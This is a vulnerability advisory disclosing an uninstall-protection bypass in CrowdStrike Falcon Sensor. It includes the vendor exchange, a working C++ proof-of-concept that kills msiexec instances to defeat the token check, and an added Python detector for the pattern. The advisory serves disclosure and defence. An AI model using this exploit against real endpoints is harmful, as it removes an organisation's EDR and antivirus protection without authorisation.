------------------------------------------------------------------v1-
modzero Security Advisory [MZ-22-02]: Uninstall Protection Bypass for
CrowdStrike Falcon Sensor
---------------------------------------------------------------------

CrowdStrike Falcon is a cloud-powered endpoint detection and response
(EDR) and antivirus (AV) solution. On each end-device a lightweight
managed sensor is deployed which makes use of the cloud-based
capabilities. The sensor can be configured with an uninstall
protection, which prevents the uninstallation of the CrowdStrike
Falcon sensor on the end-device without a one-time generated
maintenance token.

Exploiting this vulnerability allows an attacker with administrative
privileges to bypass the token check on Windows end-devices and to
uninstall the sensor from the device without proper authorization,
effectively removing the device's EDR and AV protection.

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

2022/04    - Found vulnerability in CrowdStrike Falcon Sensor
             (6.31.14505.0)
2022/06/04 - modzero asked for a security contact @ CrowdStrike,
             because their "report a security bug" page only referred
             to the hackerone Bug Bounty program.
2022/06/06 - CS answered that modzero can use the hackerone submission
             page, or send an e-mail to their support at
             support@crowdstrike.com.
2022/06/06 - modzero asked if it is okay to send sensitive information
             about 0day vulnerabilities to support@. modzero also told
             CS that we are not willing to accept the terms &
             conditions of hackerone, which is why we asked for a
             direct security contact.
2022/06/06 - CS offered to enroll modzero in a private bug bounty
             program at hackerone, under the condition that we are
             willing to sign a mutual non-disclosure agreement.
2022/06/07 - To prevent further misunderstandings, modzero told CS
             again that:
             * We would like to submit a security-related bug.
             * We don't want to participate in any bug bounty
               programs.
             * We are not willing to sign any NDA, because WE are the
               ones providing information to CS.
             * We are not willing to accept any sort of terms and
               conditions that are out of scope of well-known hacker
               ethics.
             * We only want to get a reliable security contact on
               their side.
             Additionally, modzero sent a link to their current
             vulnerability disclosure policy.
2022/06/07 - CS told us to send the report to bugs@ for review.
2022/06/13 - CS asked for the report.
2022/06/13 - modzero told CS that we need a little bit more time to
             finish and double-check everything before submitting.
2022/06/29 - modzero sent the Security Advisory (draft), the Proof of
             Concept exploit source code, the executable and a
             screencast video of the PoC to CS.
2022/06/29 - CS told us that we were testing using only an
             unsupported version of the Falcon Sensor. CS told us
             about the error message and that they are not able to
             reproduce.
2022/07/05 - modzero told CS that the error message can be ignored
             and referred to the PoC screencast video. We also asked
             for a recent (14-day trial) version of Falcon Sensor to
             provide reliable information on whether the most recent
             version is still vulnerable or not.
2022/07/05 - CS answered: "We do not provide trial licenses as part
             of this process, however having tested the PoC on our
             end with a modern sensor this does not appear to be a
             valid issue."
2022/07/05 - modzero announced publishing the advisory and exploit
             code by the end of the week, asking if the quote of CS
             "Having tested the PoC on our end with a modern sensor
             this does not appear to be a valid issue" can be used in
             our report.
2022/07/06 - CS asked for a meeting between modzero's Sr Leadership
             and CS to discuss next steps related to the bug bounty
             disclosure.
2022/07/07 - modzero, again, told CS that we are not participating in
             any bug bounty program and that there is no need to
             discuss NDAs or bug bounty programs.
2022/08/12 - modzero managed to acquire a recent version (6.42.15610)
             of CrowdStrike Falcon and verified that the attack is
             still possible. Furthermore, modzero figured out that the
             vulnerability (that was rejected by CrowdStrike first)
             has been silently fixed: the PoC that had been sent to
             CrowdStrike was flagged as malicious. The msiexec call of
             the uninstaller was also flagged as malicious. Both
             "countermeasures" can be circumvented easily; we updated
             the exploit accordingly.
2022/08/22 - modzero publishes the Security Advisory and exploit
             code, because CrowdStrike was unwilling to set up a
             cooperative information exchange outside of their
             NDA-ridden bug bounty program to discuss vulnerabilities
             in their products.

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor:      CrowdStrike
Homepage:    https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-enterprise/

Error Class:
  * CWE-691: Insufficient Control Flow Management
    (https://cwe.mitre.org/data/definitions/691.html)
    The code does not sufficiently manage its control flow during
    execution, creating conditions in which the control flow can be
    modified in unexpected ways.

Products known to be affected:
  * CrowdStrike Falcon (6.31.14505.0)
  * CrowdStrike Falcon (6.42.15610)

Please note: Other versions might be affected as well, but were not
tested by modzero.

CVE-ID:    CVE-2022-2841
Severity:  Medium/4.4 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)

Vendor:              CrowdStrike
Product:             CrowdStrike Falcon
Version:             6.42.15610
Attack type:         Local
Affected Components: Uninstall Protection

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

CrowdStrike Falcon is a cloud-native antivirus (AV) and endpoint
detection and response (EDR) solution for end-devices.
A sensor agent is deployed on each end-device; the agents are then
managed by and connected to a cloud monitoring system. The "Uninstall
Protection" feature allows administrators to lock down devices and
prevent device users, including local administrators, from removing
the sensor agent without a one-time, device-specific maintenance
token.

During a security analysis modzero was required to uninstall a
CrowdStrike Falcon Sensor installation on a Windows workstation
without having access to the maintenance token. After analysing the
software removal procedure, it was possible to develop an automated
proof of concept tool which corrupts the CrowdStrike Falcon Sensor
removal process: the tool starts the regular MSI uninstall
(msiexec /x <ProductCode>), watches the msiexec.exe instances that
Windows Installer spawns for it and terminates the fourth and fifth
one. The open MSI handles left behind by the killed instances break
the token check, and the removal procedure continues without it. This
allows an attacker with administrator rights to uninstall and stop the
CrowdStrike Falcon Sensor and its corresponding Windows services
without a valid token.

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

An attacker with administrative access to a machine can bypass the
"Uninstall Protection" of the CrowdStrike Falcon Sensor. The attack
removes the software, leaving the CrowdStrike administrator in the
dark about potential attacks on the now unprotected endpoint. This is
particularly undesirable, given that this is a cloud-native service
where customers expect alerts for security-related actions.

---------------------------------------------------------------------
5. Proof of Concept
---------------------------------------------------------------------

The following proof of concept code allows an administrator to remove
the CrowdStrike Falcon Sensor without the maintenance token:

//
// CrowdStrike Falcon Sensor
// De-Installation Auth-Bypass Proof-of-Concept
//
// Falcon Sensor is installed with an uninstall protection, to prevent
// unauthorized administrators from removing Falcon Sensor. The following
// Proof-of-Concept exploit allows to bypass the uninstall protection
// (token check). This can be used to remove the endpoint's EDR and AV
// protection.
//
// References:
// - modzero MZ-22-02 Security Advisory
// - CVE: CVE-2022-2841
//
// Version: 0.3
// Secrecy: CONFIDENTIAL
// Copyright 2022, modzero AG, Wartstr. 20, 8400 Winterthur, Switzerland
//
// Usage example:
// .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'
//
#pragma once
#define _CRT_SECURE_NO_WARNINGS
// The process-name comparison below uses wide-character functions, so the
// build must be a Unicode build (the Visual Studio default).
#ifndef UNICODE
#define UNICODE
#endif
#ifndef _UNICODE
#define _UNICODE
#endif
#include <windows.h>
#include <psapi.h>
#include <tchar.h>
#include <algorithm>
#include <iostream>
#include <list>
#include <string>
#pragma comment(lib, "psapi.lib")

// msiexec.exe instances seen so far, and how many of them there were
std::list<DWORD> g_msiexec_instances = {};
int g_msiexec_instance_count = 0;

void CheckProcess(DWORD process_id)
{
    TCHAR process_name[MAX_PATH] = { 0 };
    HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (nullptr != h_proc) {
        HMODULE h_mod = 0;
        DWORD c_need = 0;
        if (EnumProcessModules(h_proc, &h_mod, sizeof(h_mod), &c_need)) {
            // the size argument is a count of TCHARs, not bytes
            GetModuleBaseName(h_proc, h_mod, process_name,
                              sizeof(process_name) / sizeof(TCHAR));
        }
    } else {
        return;
    }

    if (wcsstr(_wcslwr(process_name), __T("msiexec"))) {
        bool already_found = (
            std::find(g_msiexec_instances.begin(), g_msiexec_instances.end(),
                      process_id) != g_msiexec_instances.end());
        if (!already_found) {
            g_msiexec_instance_count++;
            std::cout << "[+] Installer spawned process: " << process_id
                      << std::endl;
            g_msiexec_instances.push_front(process_id);

            // Kill the fourth and fifth msiexec instance to leave open MSI
            // handles behind. This breaks the uninstaller's token check.
            if (g_msiexec_instance_count == 4 || g_msiexec_instance_count == 5) {
                std::cout << "[+] Killing process: " << process_id << std::endl;
                if (!TerminateProcess(h_proc, 123)) {
                    std::cout << "[!] Failed to kill process with PID "
                              << process_id << ": " << GetLastError()
                              << std::endl;
                }
                if (g_msiexec_instance_count == 5) {
                    std::cout << "[+] Uninstall Protection should be bypassed."
                              << std::endl;
                    CloseHandle(h_proc);
                    exit(0);
                }
            }
        }
    }
    CloseHandle(h_proc);
}

int main(int argc, char* argv[])
{
    DWORD proc_ids[1024] = { 0 };
    DWORD c_need = 0;
    DWORD c_procs = 0;
    DWORD i = 0;

    if (argc != 2) {
        std::cout << "Usage:" << std::endl
                  << argv[0] << " PATH_TO_CsAgent.LionLanner.msi" << std::endl;
        return 1;
    }

    // increase priority to realtime and start the uninstall
    SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);

    // extract the product code GUID ({...}) from the Package Cache path
    std::string path = std::string(argv[1]);
    size_t first = path.find("{");
    size_t last = path.find_last_of("}");
    if (first == std::string::npos || last == std::string::npos || last < first) {
        std::cout << "[-] No product code GUID found in path." << std::endl;
        return 1;
    }
    std::string guid = path.substr(first, last - first + 1);
    std::string cmd = "start msiexec /x " + guid;
    system(cmd.c_str());

    // now listen for processes popping up
    while (1) {
        if (!EnumProcesses(proc_ids, sizeof(proc_ids), &c_need)) {
            std::cout << "[-] Failed to read processes." << std::endl;
            return 1;
        }
        c_procs = c_need / sizeof(DWORD);

        // Check every process ID
        for (i = 0; i < c_procs; i++) {
            if (proc_ids[i] != 0) {
                CheckProcess(proc_ids[i]);
            }
        }
    }
    return 0;
}

To use the Proof of Concept, the code must be compiled with Visual
Studio and be run as administrator, pointing to
`CsAgent.LionLanner.msi` as argument, e.g.:

.\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'

After executing it, the software removal procedure starts and a popup
with an error message stating that the token is invalid will show up.
After closing the popup, the uninstallation continues and removes all
components.

---------------------------------------------------------------------
6. Fix
---------------------------------------------------------------------

- n/a

---------------------------------------------------------------------
7. Credits
---------------------------------------------------------------------

* Pascal Zenker (parzel) of modzero
* Max Moser (mmo) of modzero

---------------------------------------------------------------------
8. About modzero
---------------------------------------------------------------------

The independent Swiss-German company modzero assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts, software
and hardware components as well as the development of individual
solutions. Colleagues at modzero work exclusively in practical, highly
technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.

https://www.modzero.com
contact@modzero.com

modzero follows the coordinated disclosure practices described here:
https://www.modzero.com/static/modzero_Disclosure_Policy.pdf. This
policy should have been sent to the vendor along with this security
advisory.

---------------------------------------------------------------------
9. Disclaimer
---------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition.
There are no warranties concerning this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from using, or
reliance on, this information.
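---------------------------------------------------------------------
10. Appendix: Detecting the bypass pattern from process telemetry
---------------------------------------------------------------------

The following detector is an added example for this advisory; it is
not modzero's PoC and not CrowdStrike code. The attack in sections 3
and 5 has a recognisable shape on the endpoint: an MSI uninstall
(msiexec /x {ProductCode}) is started, a process that is not part of
Windows Installer opens msiexec.exe instances with a handle that
carries PROCESS_TERMINATE (the PoC asks for PROCESS_ALL_ACCESS), and
those instances then exit while the uninstall is still running. The
code correlates that chain over Sysmon-style events (Event ID 1
ProcessCreate, 10 ProcessAccess, 5 ProcessTerminate; the field names
follow the Sysmon schema). The event records, PIDs, paths, the 60 s
window, the allow-list of installer images and the product GUID are
constructed for the example, since the real Falcon product code is
not given in this advisory. The pattern is generic: it flags any
tool that kills Windows Installer server processes during an
uninstall, not only this PoC.

```python
"""Correlate uninstall start -> foreign PROCESS_TERMINATE handle on msiexec.exe
-> msiexec exit. Added example for MZ-22-02; events below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

PROCESS_TERMINATE = 0x0001  # right TerminateProcess() needs; included in PROCESS_ALL_ACCESS (0x1FFFFF)
GUID_RE = r"\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}"
UNINSTALL_RE = re.compile(r'msiexec(?:\.exe)?"?\s+/x\s+(' + GUID_RE + r")", re.I)
WINDOW = timedelta(seconds=60)  # assumption: how long an uninstall counts as "in progress"
# Assumption: images that may legitimately hold terminate rights on msiexec.exe.
ALLOWED_SOURCES = {r"c:\windows\system32\msiexec.exe", r"c:\windows\system32\services.exe"}


@dataclass(frozen=True)
class Alert:
    source_image: str
    source_pid: int
    target_pid: int
    product_code: str


def _utc(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def detect(events: list[dict]) -> list[Alert]:
    """One Alert per msiexec instance that a non-installer process opened with
    PROCESS_TERMINATE during an active uninstall and that exited afterwards."""
    uninstalls: list[tuple[datetime, str]] = []     # (start time, product code)
    suspects: dict[int, tuple[str, int, str]] = {}  # msiexec pid -> (source image, source pid, product code)
    alerts: list[Alert] = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        t, eid = _utc(ev["UtcTime"]), ev["EventID"]
        if eid == 1:
            m = UNINSTALL_RE.search(ev.get("CommandLine", ""))
            if m:
                uninstalls.append((t, m.group(1).lower()))
        elif eid == 10 and ev["TargetImage"].lower().endswith(r"\msiexec.exe"):
            active = [code for (t0, code) in uninstalls if timedelta(0) <= t - t0 <= WINDOW]
            granted = int(ev["GrantedAccess"], 16)
            if active and granted & PROCESS_TERMINATE and ev["SourceImage"].lower() not in ALLOWED_SOURCES:
                suspects[ev["TargetProcessId"]] = (ev["SourceImage"], ev["SourceProcessId"], active[-1])
        elif eid == 5 and ev["ProcessId"] in suspects:
            image, spid, code = suspects.pop(ev["ProcessId"])
            alerts.append(Alert(image, spid, ev["ProcessId"], code))
    return alerts


MSIEXEC = r"C:\Windows\System32\msiexec.exe"
PRODUCT_CODE = "{11111111-2222-3333-4444-555555555555}"  # constructed placeholder, not Falcon's real code

# Constructed sample: the PoC starts the uninstall (cmd.exe -> msiexec /x), the
# Installer service spawns its own instances, and the PoC kills one of them.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2022-08-12 10:00:00.000", "Image": MSIEXEC, "ProcessId": 4100,
     "CommandLine": "msiexec /x " + PRODUCT_CODE, "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "UtcTime": "2022-08-12 10:00:01.200", "Image": MSIEXEC, "ProcessId": 4188,
     "CommandLine": MSIEXEC + " /V", "ParentImage": r"C:\Windows\System32\services.exe"},
    # Windows Installer opening its own child: allowed source, no alert
    {"EventID": 10, "UtcTime": "2022-08-12 10:00:01.300", "SourceImage": MSIEXEC, "SourceProcessId": 4188,
     "TargetImage": MSIEXEC, "TargetProcessId": 4201, "GrantedAccess": "0x1FFFFF"},
    # the bypass tool opening an installer instance with PROCESS_ALL_ACCESS, which then dies
    {"EventID": 10, "UtcTime": "2022-08-12 10:00:03.500", "SourceImage": r"C:\Users\admin\CSFalconTokenBypass.exe",
     "SourceProcessId": 3999, "TargetImage": MSIEXEC, "TargetProcessId": 4201, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 5, "UtcTime": "2022-08-12 10:00:03.510", "Image": MSIEXEC, "ProcessId": 4201},
    # same handle pattern long after the window closed: no alert
    {"EventID": 10, "UtcTime": "2022-08-12 10:05:00.000", "SourceImage": r"C:\Users\admin\CSFalconTokenBypass.exe",
     "SourceProcessId": 3999, "TargetImage": MSIEXEC, "TargetProcessId": 4300, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 5, "UtcTime": "2022-08-12 10:05:00.100", "Image": MSIEXEC, "ProcessId": 4300},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"ALERT: {a.source_image} (pid {a.source_pid}) terminated msiexec pid "
              f"{a.target_pid} during uninstall of {a.product_code}")
```

The correlation deliberately keys on the handle rights rather than on
the PoC's file name, since the timeline shows that CrowdStrike's
signature on the PoC binary was trivially evaded. Tune WINDOW and
ALLOWED_SOURCES to the environment; on hosts where other deployment
agents legitimately drive msiexec, add their images to the allow-list
rather than widening the access-mask test.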